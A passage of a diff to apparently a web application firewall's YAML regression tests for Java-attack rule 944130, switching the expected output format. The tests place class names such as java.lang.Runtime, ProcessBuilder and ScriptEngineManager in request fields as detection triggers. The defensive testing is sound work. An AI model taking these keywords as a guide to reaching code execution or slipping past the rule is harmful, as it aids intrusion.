\"944130\"" + log: + expect_ids: [944130] - test_id: 254 desc: "Argument test includes keyword java.io.StringReader" stages: @@ -4898,7 +5151,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.StringReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 255 desc: "Argument name includes keyword java.io.StringReader" stages: @@ -4917,7 +5171,8 @@ tests: version: "HTTP/1.0" data: "java.io.StringReader=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 256 desc: "Cookie test includes keyword java.io.StringReader" stages: @@ -4937,7 +5192,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 257 desc: "Cookie name includes keyword java.io.StringReader" stages: @@ -4957,7 +5213,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 258 desc: "Request header test includes keyword java.io.StringReader" stages: @@ -4977,7 +5234,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 259 desc: "XML attribute value includes keyword java.io.StringReader" stages: @@ -4996,7 +5254,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 260 desc: "XML element value includes keyword java.io.StringReader" stages: @@ -5015,7 +5274,8 @@ tests: version: "HTTP/1.0" data: "java.io.StringReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 261 desc: "Nested XML element value includes keyword java.io.StringReader" stages: @@ -5034,7 +5294,8 @@ tests: version: "HTTP/1.0" data: "java.io.StringReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 262 desc: "Content-Type text/plain includes keyword java.io.StringReader" stages: @@ -5053,7 +5314,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.StringReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 263 desc: "Content-Type application/json arg value includes keyword java.io.StringReader" stages: @@ -5072,7 +5334,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.StringReader\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 264 desc: "Content-Type application/json arg name includes keyword java.io.StringReader" stages: @@ -5091,7 +5354,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.StringReader\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 265 desc: "Argument test includes keyword java.lang.Class" stages: @@ -5110,7 +5374,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.Class" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 266 desc: "Argument name includes keyword java.lang.Class" stages: @@ -5129,7 +5394,8 @@ tests: version: "HTTP/1.0" data: "java.lang.Class=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 267 desc: "Cookie test includes keyword java.lang.Class" stages: @@ -5149,7 +5415,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 268 desc: "Cookie name includes keyword java.lang.Class" stages: @@ -5169,7 +5436,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 269 desc: "Request header test includes keyword java.lang.Class" stages: @@ -5189,7 +5457,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 270 desc: "XML attribute value includes keyword java.lang.Class" stages: @@ -5208,7 +5477,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 271 desc: "XML element value includes keyword java.lang.Class" stages: @@ -5227,7 +5497,8 @@ tests: version: "HTTP/1.0" data: "java.lang.Class" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 272 desc: "Nested XML element value includes keyword java.lang.Class" stages: @@ -5246,7 +5517,8 @@ tests: version: "HTTP/1.0" data: "java.lang.Class" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 273 desc: "Content-Type text/plain includes keyword java.lang.Class" stages: @@ -5265,7 +5537,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.Class" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 274 desc: "Content-Type application/json arg value includes keyword java.lang.Class" stages: @@ -5284,7 +5557,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.lang.Class\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 275 desc: "Content-Type application/json arg name includes keyword java.lang.Class" stages: @@ -5303,7 +5577,8 @@ tests: version: "HTTP/1.0" data: "{\"java.lang.Class\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 276 desc: "Argument test includes keyword java.lang.Integer" stages: @@ -5322,7 +5597,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.Integer" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 277 desc: "Argument name includes keyword java.lang.Integer" stages: @@ -5341,7 +5617,8 @@ tests: version: "HTTP/1.0" data: "java.lang.Integer=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 278 desc: "Cookie test includes keyword java.lang.Integer" stages: @@ -5361,7 +5638,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 279 desc: "Cookie name includes keyword java.lang.Integer" stages: @@ -5381,7 +5659,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 280 desc: "Request header test includes keyword java.lang.Integer" stages: @@ -5401,7 +5680,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 281 desc: "XML attribute value includes keyword java.lang.Integer" stages: @@ -5420,7 +5700,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 282 desc: "XML element value includes keyword java.lang.Integer" stages: @@ -5439,7 +5720,8 @@ tests: version: "HTTP/1.0" data: "java.lang.Integer" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 283 desc: "Nested XML element value includes keyword java.lang.Integer" stages: @@ -5458,7 +5740,8 @@ tests: version: "HTTP/1.0" data: "java.lang.Integer" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 284 desc: "Content-Type text/plain includes keyword java.lang.Integer" stages: @@ -5477,7 +5760,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.Integer" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 285 desc: "Content-Type application/json arg value includes keyword java.lang.Integer" stages: @@ -5496,7 +5780,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.lang.Integer\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 286 desc: "Content-Type application/json arg name includes keyword java.lang.Integer" stages: @@ -5515,7 +5800,8 @@ tests: version: "HTTP/1.0" data: "{\"java.lang.Integer\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 287 desc: "Argument test includes keyword java.lang.Number" stages: @@ -5534,7 +5820,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.Number" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 288 desc: "Argument name includes keyword java.lang.Number" stages: @@ -5553,7 +5840,8 @@ tests: version: "HTTP/1.0" data: "java.lang.Number=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 289 desc: "Cookie test includes keyword java.lang.Number" stages: @@ -5573,7 +5861,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 290 desc: "Cookie name includes keyword java.lang.Number" stages: @@ -5593,7 +5882,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 291 desc: "Request header test includes keyword java.lang.Number" stages: @@ -5613,7 +5903,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 292 desc: "XML attribute value includes keyword java.lang.Number" stages: @@ -5632,7 +5923,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 293 desc: "XML element value includes keyword java.lang.Number" stages: @@ -5651,7 +5943,8 @@ tests: version: "HTTP/1.0" data: "java.lang.Number" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 294 desc: "Nested XML element value includes keyword java.lang.Number" stages: @@ -5670,7 +5963,8 @@ tests: version: "HTTP/1.0" data: "java.lang.Number" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 295 desc: "Content-Type text/plain includes keyword java.lang.Number" stages: @@ -5689,7 +5983,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.Number" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 296 desc: "Content-Type application/json arg value includes keyword java.lang.Number" stages: @@ -5708,7 +6003,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.lang.Number\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 297 desc: "Content-Type application/json arg name includes keyword java.lang.Number" stages: @@ -5727,7 +6023,8 @@ tests: version: "HTTP/1.0" data: "{\"java.lang.Number\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 298 desc: "Argument test includes keyword java.lang.Object" stages: @@ -5746,7 +6043,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.Object" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 299 desc: "Argument name includes keyword java.lang.Object" stages: @@ -5765,7 +6063,8 @@ tests: version: "HTTP/1.0" data: "java.lang.Object=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 300 desc: "Cookie test includes keyword java.lang.Object" stages: @@ -5785,7 +6084,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 301 desc: "Cookie name includes keyword java.lang.Object" stages: @@ -5805,7 +6105,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 302 desc: "Request header test includes keyword java.lang.Object" stages: @@ -5825,7 +6126,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 303 desc: "XML attribute value includes keyword java.lang.Object" stages: @@ -5844,7 +6146,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 304 desc: "XML element value includes keyword java.lang.Object" stages: @@ -5863,7 +6166,8 @@ tests: version: "HTTP/1.0" data: "java.lang.Object" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 305 desc: "Nested XML element value includes keyword java.lang.Object" stages: @@ -5882,7 +6186,8 @@ tests: version: "HTTP/1.0" data: "java.lang.Object" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 306 desc: "Content-Type text/plain includes keyword java.lang.Object" stages: @@ -5901,7 +6206,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.Object" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 307 desc: "Content-Type application/json arg value includes keyword java.lang.Object" stages: @@ -5920,7 +6226,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.lang.Object\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 308 desc: "Content-Type application/json arg name includes keyword java.lang.Object" stages: @@ -5939,7 +6246,8 @@ tests: version: "HTTP/1.0" data: "{\"java.lang.Object\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 309 desc: "Argument test includes keyword java.lang.Process" stages: @@ -5958,7 +6266,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.Process" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 310 desc: "Argument name includes keyword java.lang.Process" stages: @@ -5977,7 +6286,8 @@ tests: version: "HTTP/1.0" data: "java.lang.Process=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 311 desc: "Cookie test includes keyword java.lang.Process" stages: @@ -5997,7 +6307,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 312 desc: "Cookie name includes keyword java.lang.Process" stages: @@ -6017,7 +6328,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 313 desc: "Request header test includes keyword java.lang.Process" stages: @@ -6037,7 +6349,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 314 desc: "XML attribute value includes keyword java.lang.Process" stages: @@ -6056,7 +6369,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 315 desc: "XML element value includes keyword java.lang.Process" stages: @@ -6075,7 +6389,8 @@ tests: version: "HTTP/1.0" data: "java.lang.Process" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 316 desc: "Nested XML element value includes keyword java.lang.Process" stages: @@ -6094,7 +6409,8 @@ tests: version: "HTTP/1.0" data: "java.lang.Process" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 317 desc: "Content-Type text/plain includes keyword java.lang.Process" stages: @@ -6113,7 +6429,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.Process" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 318 desc: "Content-Type application/json arg value includes keyword java.lang.Process" stages: @@ -6132,7 +6449,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.lang.Process\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 319 desc: "Content-Type application/json arg name includes keyword java.lang.Process" stages: @@ -6151,7 +6469,8 @@ tests: version: "HTTP/1.0" data: "{\"java.lang.Process\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 320 desc: "Argument test includes keyword java.lang.ProcessBuilder" stages: @@ -6170,7 +6489,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.ProcessBuilder" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 321 desc: "Argument name includes keyword java.lang.ProcessBuilder" stages: @@ -6189,7 +6509,8 @@ tests: version: "HTTP/1.0" data: "java.lang.ProcessBuilder=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 322 desc: "Cookie test includes keyword java.lang.ProcessBuilder" stages: @@ -6209,7 +6530,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 323 desc: "Cookie name includes keyword java.lang.ProcessBuilder" stages: @@ -6229,7 +6551,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 324 desc: "Request header test includes keyword java.lang.ProcessBuilder" stages: @@ -6249,7 +6572,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 325 desc: "XML attribute value includes keyword java.lang.ProcessBuilder" stages: @@ -6268,7 +6592,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 326 desc: "XML element value includes keyword java.lang.ProcessBuilder" stages: @@ -6287,7 +6612,8 @@ tests: version: "HTTP/1.0" data: "java.lang.ProcessBuilder" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 327 desc: "Nested XML element value includes keyword java.lang.ProcessBuilder" stages: @@ -6306,7 +6632,8 @@ tests: version: "HTTP/1.0" data: "java.lang.ProcessBuilder" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 328 desc: "Content-Type text/plain includes keyword java.lang.ProcessBuilder" stages: @@ -6325,7 +6652,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.ProcessBuilder" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 329 desc: "Content-Type application/json arg value includes keyword java.lang.ProcessBuilder" stages: @@ -6344,7 +6672,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.lang.ProcessBuilder\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 330 desc: "Content-Type application/json arg name includes keyword java.lang.ProcessBuilder" stages: @@ -6363,7 +6692,8 @@ tests: version: "HTTP/1.0" data: "{\"java.lang.ProcessBuilder\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 331 desc: "Argument test includes keyword java.lang.reflect" stages: @@ -6382,7 +6712,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.reflect" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 332 desc: "Argument name includes keyword java.lang.reflect" stages: @@ -6401,7 +6732,8 @@ tests: version: "HTTP/1.0" data: "java.lang.reflect=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 333 desc: "Cookie test includes keyword java.lang.reflect" stages: @@ -6421,7 +6753,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 334 desc: "Cookie name includes keyword java.lang.reflect" stages: @@ -6441,7 +6774,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 335 desc: "Request header test includes keyword java.lang.reflect" stages: @@ -6461,7 +6795,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 336 desc: "XML attribute value includes keyword java.lang.reflect" stages: @@ -6480,7 +6815,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 337 desc: "XML element value includes keyword java.lang.reflect" stages: @@ -6499,7 +6835,8 @@ tests: version: "HTTP/1.0" data: "java.lang.reflect" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 338 desc: "Nested XML element value includes keyword java.lang.reflect" stages: @@ -6518,7 +6855,8 @@ tests: version: "HTTP/1.0" data: "java.lang.reflect" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 339 desc: "Content-Type text/plain includes keyword java.lang.reflect" stages: @@ -6537,7 +6875,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.reflect" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 340 desc: "Content-Type application/json arg value includes keyword java.lang.reflect" stages: @@ -6556,7 +6895,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.lang.reflect\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 341 desc: "Content-Type application/json arg name includes keyword java.lang.reflect" stages: @@ -6575,7 +6915,8 @@ tests: version: "HTTP/1.0" data: "{\"java.lang.reflect\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 342 desc: "Argument test includes keyword java.lang.Runtime" stages: @@ -6594,7 +6935,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.Runtime" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 343 desc: "Argument name includes keyword java.lang.Runtime" stages: @@ -6613,7 +6955,8 @@ tests: version: "HTTP/1.0" data: "java.lang.Runtime=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 344 desc: "Cookie test includes keyword java.lang.Runtime" stages: @@ -6633,7 +6976,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 345 desc: "Cookie name includes keyword java.lang.Runtime" stages: @@ -6653,7 +6997,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 346 desc: "Request header test includes keyword java.lang.Runtime" stages: @@ -6673,7 +7018,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 347 desc: "XML attribute value includes keyword java.lang.Runtime" stages: @@ -6692,7 +7038,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 348 desc: "XML element value includes keyword java.lang.Runtime" stages: @@ -6711,7 +7058,8 @@ tests: version: "HTTP/1.0" data: "java.lang.Runtime" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 349 desc: "Nested XML element value includes keyword java.lang.Runtime" stages: @@ -6730,7 +7078,8 @@ tests: version: "HTTP/1.0" data: "java.lang.Runtime" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 350 desc: "Content-Type text/plain includes keyword java.lang.Runtime" stages: @@ -6749,7 +7098,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.Runtime" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 351 desc: "Content-Type application/json arg value includes keyword java.lang.Runtime" stages: @@ -6768,7 +7118,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.lang.Runtime\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 352 desc: "Content-Type application/json arg name includes keyword java.lang.Runtime" stages: @@ -6787,7 +7138,8 @@ tests: version: "HTTP/1.0" data: "{\"java.lang.Runtime\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 353 desc: "Argument test includes keyword java.lang.String" stages: @@ -6806,7 +7158,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.String" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 354 desc: "Argument name includes keyword java.lang.String" stages: @@ -6825,7 +7178,8 @@ tests: version: "HTTP/1.0" data: "java.lang.String=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 355 desc: "Cookie test includes keyword java.lang.String" stages: @@ -6845,7 +7199,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 356 desc: "Cookie name includes keyword java.lang.String" stages: @@ -6865,7 +7220,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 357 desc: "Request header test includes keyword java.lang.String" stages: @@ -6885,7 +7241,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 358 desc: "XML attribute value includes keyword java.lang.String" stages: @@ -6904,7 +7261,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 359 desc: "XML element value includes keyword java.lang.String" stages: @@ -6923,7 +7281,8 @@ tests: version: "HTTP/1.0" data: "java.lang.String" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 360 desc: "Nested XML element value includes keyword java.lang.String" stages: @@ -6942,7 +7301,8 @@ tests: version: "HTTP/1.0" data: "java.lang.String" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 361 desc: "Content-Type text/plain includes keyword java.lang.String" stages: @@ -6961,7 +7321,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.String" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 362 desc: "Content-Type application/json arg value includes keyword java.lang.String" stages: @@ -6980,7 +7341,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.lang.String\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 363 desc: "Content-Type application/json arg name includes keyword java.lang.String" stages: @@ -6999,7 +7361,8 @@ tests: version: "HTTP/1.0" data: "{\"java.lang.String\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 364 desc: "Argument test includes keyword java.lang.StringBuilder" stages: @@ -7018,7 +7381,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.StringBuilder" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 365 desc: "Argument name includes keyword java.lang.StringBuilder" stages: @@ -7037,7 +7401,8 @@ tests: version: "HTTP/1.0" data: "java.lang.StringBuilder=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 366 desc: "Cookie test includes keyword java.lang.StringBuilder" stages: @@ -7057,7 +7422,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 367 desc: "Cookie name includes keyword java.lang.StringBuilder" stages: @@ -7077,7 +7443,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 368 desc: "Request header test includes keyword java.lang.StringBuilder" stages: @@ -7097,7 +7464,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 369 desc: "XML attribute value includes keyword java.lang.StringBuilder" stages: @@ -7116,7 +7484,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 370 desc: "XML element value includes keyword java.lang.StringBuilder" stages: @@ -7135,7 +7504,8 @@ tests: version: "HTTP/1.0" data: "java.lang.StringBuilder" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 371 desc: "Nested XML element value includes keyword java.lang.StringBuilder" stages: @@ -7154,7 +7524,8 @@ tests: version: "HTTP/1.0" data: "java.lang.StringBuilder" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 372 desc: "Content-Type text/plain includes keyword java.lang.StringBuilder" stages: @@ -7173,7 +7544,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.StringBuilder" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 373 desc: "Content-Type application/json arg value includes keyword java.lang.StringBuilder" stages: @@ -7192,7 +7564,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.lang.StringBuilder\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 374 desc: "Content-Type application/json arg name includes keyword java.lang.StringBuilder" stages: @@ -7211,7 +7584,8 @@ tests: version: "HTTP/1.0" data: "{\"java.lang.StringBuilder\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 375 desc: "Argument test includes keyword java.lang.System" stages: @@ -7230,7 +7604,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.System" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 376 desc: "Argument name includes keyword java.lang.System" stages: @@ -7249,7 +7624,8 @@ tests: version: "HTTP/1.0" data: "java.lang.System=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 377 desc: "Cookie test includes keyword java.lang.System" stages: @@ -7269,7 +7645,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 378 desc: "Cookie name includes keyword java.lang.System" stages: @@ -7289,7 +7666,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 379 desc: "Request header test includes keyword java.lang.System" stages: @@ -7309,7 +7687,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 380 desc: "XML attribute value includes keyword java.lang.System" stages: @@ -7328,7 +7707,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 381 desc: "XML element value includes keyword java.lang.System" stages: @@ -7347,7 +7727,8 @@ tests: version: "HTTP/1.0" data: "java.lang.System" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 382 desc: "Nested XML element value includes keyword java.lang.System" stages: @@ -7366,7 +7747,8 @@ tests: version: "HTTP/1.0" data: "java.lang.System" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 383 desc: "Content-Type text/plain includes keyword java.lang.System" stages: @@ -7385,7 +7767,8 @@ tests: version: "HTTP/1.0" data: "test=java.lang.System" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 384 desc: "Content-Type application/json arg value includes keyword java.lang.System" stages: @@ -7404,7 +7787,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.lang.System\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 385 desc: "Content-Type application/json arg name includes keyword java.lang.System" stages: @@ -7423,7 +7807,8 @@ tests: version: "HTTP/1.0" data: "{\"java.lang.System\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 386 desc: "Argument test includes keyword javax.script.ScriptEngineManager" stages: @@ -7442,7 +7827,8 @@ tests: version: "HTTP/1.0" data: "test=javax.script.ScriptEngineManager" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 387 desc: "Argument name includes keyword javax.script.ScriptEngineManager" stages: 